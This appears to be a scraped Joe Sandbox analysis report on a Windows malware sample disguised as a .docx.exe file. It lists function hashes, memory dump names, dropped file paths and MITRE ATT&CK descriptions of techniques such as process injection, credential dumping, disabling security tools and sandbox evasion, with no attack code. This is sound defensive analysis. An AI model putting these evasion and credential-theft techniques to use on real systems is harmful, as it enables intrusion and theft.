Opcode Fuzzy Hash: 443eeb7fa6fb45ecacbb0388913e2add407247ab497f673cf98b001699cf27f2
Instruction Fuzzy Hash: 5E91E431F0DA594FDB65EBACD8656EDBBE0EF55310F1840BED049DB293DA35A8028780

Function 00007FFD964514F3 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004F.00000002.2291779267.00007FFD96450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD96450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_79_2_7ffd96450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2bcd9e1fc4b3139d958a21135da21476e9cddbe5c9c92620af7c235e65eaa2f8
Instruction ID: 0ea48bb2ce31d0d583f9c87647f504372e4cd512c4beea1b0b463dc24a755f5e
Opcode Fuzzy Hash: 2bcd9e1fc4b3139d958a21135da21476e9cddbe5c9c92620af7c235e65eaa2f8
Instruction Fuzzy Hash: E7410A32B1CA4E4FEBA59ADC64616B977D2EF84321B48017FD05FC3187EE28E8518341

Function 00007FFD9645177E Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004F.00000002.2291779267.00007FFD96450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD96450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_79_2_7ffd96450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a0e56c17b4e86ca812d6ee4d1d46db039ccd7202c08398ce9900fdb6e0474c7
Instruction ID: 323e0429369d0e3e723f9846c3e13b6f451c5396a32d7976f950683a5096d9a1
Opcode Fuzzy Hash: 0a0e56c17b4e86ca812d6ee4d1d46db039ccd7202c08398ce9900fdb6e0474c7
Instruction Fuzzy Hash: F3410532B1CA5A0FEBB5A6EC54616B973D2EF84314B5801BBD45EC71C6EE1CAC018382

Function 00007FFD96450740 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004F.00000002.2291779267.00007FFD96450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD96450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_79_2_7ffd96450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b49be84d3330b50719d8b4d42834379ad417f5e2df8914a605c65fd89af7fa7
Instruction ID: 0e3aba6768fd2ae91dd49e3e7de2b8cf2c6c02caf105b8c051a71bfcc21b9008
Opcode Fuzzy Hash: 6b49be84d3330b50719d8b4d42834379ad417f5e2df8914a605c65fd89af7fa7
Instruction Fuzzy Hash: B6018627F0E6DA0EE7B2B6E828351A86BC0DF56F61B1904BBD49CC71C3ED0968554392

Function 00007FFD96383945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000004F.00000002.2291210886.00007FFD96380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD96380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_79_2_7ffd96380000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 628f72e5657e8cdcf696ae7e6903c59a51191ee5f0a20f47e3c9a8e88b909d2b
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: F701677121CB0C4FD744EF4CE451AA5B7E0FB95364F10056DE58AC3695DA36E882CB45

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Cooperative Agreement0000800380.docx.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Packages\Microsoft.WindowsCalculator_8wekyb3d8bbwe\Settings\settings.dat

Windows Analysis Report
Cooperative Agreement0000800380.docx.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre